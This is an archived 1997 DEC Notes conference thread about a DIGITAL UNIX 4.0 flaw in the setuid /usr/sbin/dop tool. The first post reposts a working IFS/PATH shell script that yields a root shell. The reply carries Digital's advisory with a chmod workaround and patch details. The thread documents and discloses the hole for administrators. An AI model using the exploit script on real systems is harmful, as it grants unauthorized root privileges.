[Search for users] [Overall Top Noters] [List of all Conferences] [Download this site]

Conference unxa::osf1_sysadmin_wip

Title:OSF/1 System Admin. Tools WIP
Notice:See note 4 for kit information
Moderator:GERUND::WOLFE
Created:Mon Aug 15 1994
Last Modified:Fri Apr 04 1997
Last Successful Update:Fri Jun 06 1997
Number of topics:69
Total number of notes:203

68.0. "Big hole in 4.x users can get root access." by NETRIX::"[email protected]" (sarasin) Tue Mar 04 1997 14:22

Hello, 

This is from the Alpha managers mailing list on the internet. It was just
blasted
to the world. I ran strings on /usr/sbin/dop and it seems to be part of the
sysman
tools so I am posting this here. I tried the script it works. 

Sam

>Anyone can now grab root through a shell, anyone know what dop is used
>for?
>We tried this and it works!!!! Anyone have a patch???

>In Norwegian dop is another word for drug, such as in drug abuse (dop
>missbruk). In  DEC Unix 4.0, 4.0A and 4.0B you will find /usr/sbin/dop
>setuid root. 

-------------------------cut here------------------------------------
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS="   "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
-------------------------cut here------------------------------------

run this script and get a free root shell.

[Posted by WWW Notes gateway]
T.RTitleUserPersonal
Name
DateLines
68.1GERUND::WOLFEI&#039;m going to huff, and puff, and blow your house downThu Mar 06 1997 20:27110
Yes, dop is part of the SysMan suite of tools. This is the cusomter
blitz that just went out:



                   ** NO RESTRICTIONS FOR DISTRIBUTION **

                          ---------CUT HERE--------

_______________________________________________________________________
  PRODUCT:  DIGITAL UNIX[TM] V4.0, V4.0A, V4.0B         MARCH 6, 1997

  TITLE:  Division of Privilege (DoP) - Potential Security Vulnerability
  SOURCE: Digital Equipment Corporation
          Software Security Response Team/Colorado Springs USA


----------------------------------------------------------------------
IMPACT:

  Digital has discovered a potential vulnerability with the
  Division of Privilege (DoP), "/usr/sbin/dop" for DIGITAL UNIX
  V4.0, V4.0A and V4.0B, where under certain circumstances,
  an unauthorized user may gain unauthorized privileges.  Digital
  strongly recommends that the workaround be implemented
  immediately for any version affected, and that the
  appropriate patch kit be installed as soon as it becomes
  available.
 

----------------------------------------------------------------------
RESOLUTION:

  This potential security issue has been resolved and an
  official fix for this problem will be made available
  beginning the 13th of March 1997. As the patches become
  available per affected version, Digital will provide them
  through:
  
  o the World Wide Web at the following FTP address:

    ftp://ftp.service.digital.com/public/
        the sub directory Digital_UNIX, key identifier SSRT0435U


  Note: [1]The patch kits mentioned above will be replaced in
        the near future through normal patch release
        procedures.

        [2]The appropriate patch kit must be reinstalled
        following any upgrade beginning with V4.0 
        up to and including V4.0b.
        

----------------------------------------------------------------------
TEMPORARY WORKAROUND:

  Prior to receiving the official patch for this fix, a
  temporary workaround for this problem is to clear the
  setuid bit from the /usr/sbin/dop command as follows:

                # chmod 0 /usr/sbin/dop

  This temporary workaround will resolve the security issue,
  but will also defeat DoP's purpose.  See "ADDITIONAL
  COMMENTS" below for the purpose of DoP, the effect of
  using this temporary workaround, and what to do as a
  solution while using this temporary workaround.

----------------------------------------------------------------------
ADDITIONAL COMMENTS:

  The DoP command is used to provide non-root users with the
  ability to enter the root password to access the graphical
  system management applications via the CDE application
  manager or the Host Manager.  When a non-root user
  attempts to execute a system management application
  through one of these applications, the user will be
  prompted with a password dialog.  If the user enters the
  correct root password, they will gain root privilege while
  running the given application.

  If the setuid bit is cleared from /usr/sbin/dop, then
  users will not be able to access the system management
  applications from either the CDE application manager or
  the Host Manager.

  The following are workarounds to allow users to run the
  graphical system management applications with DoP
  disabled:

  [1] Log into a CDE session as root and access the system
  management applications.

  [2] If logged in as a normal user, become root in your
  preferred X-based terminal emulator (xterm, dxterm, dtterm,
  etc.) and run the graphical system management application
  via the command line.

  If you need further information, please contact your
  normal DIGITAL support channel.

  DIGITAL appreciates your cooperation and patience. We
  regret any inconvenience applying this information may cause.

  __________________________________________________________________
  Copyright (c) Digital Equipment Corporation, 1995 All
  Rights Reserved.  Unpublished Rights Reserved Under The Copyright 
  Laws Of The United States.
  __________________________________________________________________